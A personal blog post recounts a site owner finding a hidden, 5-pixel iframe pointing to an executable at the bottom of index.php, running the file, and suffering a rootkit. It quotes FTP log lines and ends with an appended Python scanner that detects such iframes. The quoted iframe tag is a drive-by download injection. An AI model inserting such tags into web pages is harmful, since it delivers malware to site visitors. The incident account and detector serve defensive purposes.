Found this f*cker at the bottom of index.php. The file was in the top level and IE kindly downloaded it for me. It’s late, it’s my own site, and I wasn’t paying attention. I ran it. I don’t know what’s going to happen. I’m running a McAfee scan – it didn’t flag the executable – and I suppose I should grab AdAware or Spybot S&D or both.
<IFRAME src='upgrade.exe' width=5 height=5 style='display:none'></IFRAME>
Now if you’ll excuse me, I’m going to go boil my laptop.
Update 11/19:
IE went out to a bunch of sites this morning looking for a page called hltraff.php. Not good. It also killed McAfee and won’t let me do a system restore. I found the installation and as I looked at the file it disappeared from the directory. I guess I’m going to have to reformat and start over.
Update 11/25:
I am so pwned.
First access of this file – the first person who was infected by my site – gives me an idea when it was uploaded to my server.
That’s someone who my webpage may have infected. After that the accesses come several times a page.
This is the FTP access where the hacker uploaded the infection and the hacked index.php:
Sun Nov 18 15:12:51 2007 18 66.246.252.53 543744 /var/www/vhosts/
Sun Nov 18 15:12:51 2007 0 66.246.252.53 94 /var/www/vhosts/
Sun Nov 18 15:12:51 2007 0 66.246.252.53 185 /var/www/vhosts/
Sun Nov 18 15:42:47 2007 0 66.246.252.53 185 /var/www/vhosts/
66.246.252.53 resolves to sr178.2dayhost.com – that’s the hacker.
Update: It installed a rootkit. Grrrr.
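A check for the kind of injection shown in this post (a hidden, tiny IFRAME pointing at an executable, appended to index.php), as an added example that is not part of the original post. The extension list, the size threshold and the sample page are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

EXEC_EXT = (".exe", ".scr", ".com", ".pif")  # assumption: extensions worth flagging
MAX_DIM = 10                                 # assumption: sizes up to this count as "tiny"

def _tiny(value):
    """True if a width/height attribute starts with a number <= MAX_DIM."""
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= MAX_DIM

class IframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (line number, src, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":  # HTMLParser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        src = a.get("src", "")
        reasons = []
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("tiny dimensions")
        if src.lower().split("?")[0].endswith(EXEC_EXT):
            reasons.append("src is an executable")
        if reasons:
            self.findings.append((self.getpos()[0], src, reasons))

def scan(text):
    """Return suspicious iframes found in one file's contents."""
    finder = IframeFinder()
    finder.feed(text)
    finder.close()
    return finder.findings

# Constructed sample: a normal page with one legitimate embed, then the
# injected tag from this post appended after the closing </html>.
SAMPLE = """<?php include 'header.php'; ?>
<html><body>
<iframe src="https://maps.example.com/embed" width="600" height="400"></iframe>
</body></html>
<IFRAME src='upgrade.exe' width=5 height=5 style='display:none'></IFRAME>
"""
```

Run `scan()` over the contents of each .php and .html file under the web root; any hit, or any file whose modification time matches an unexpected FTP upload, deserves a manual look.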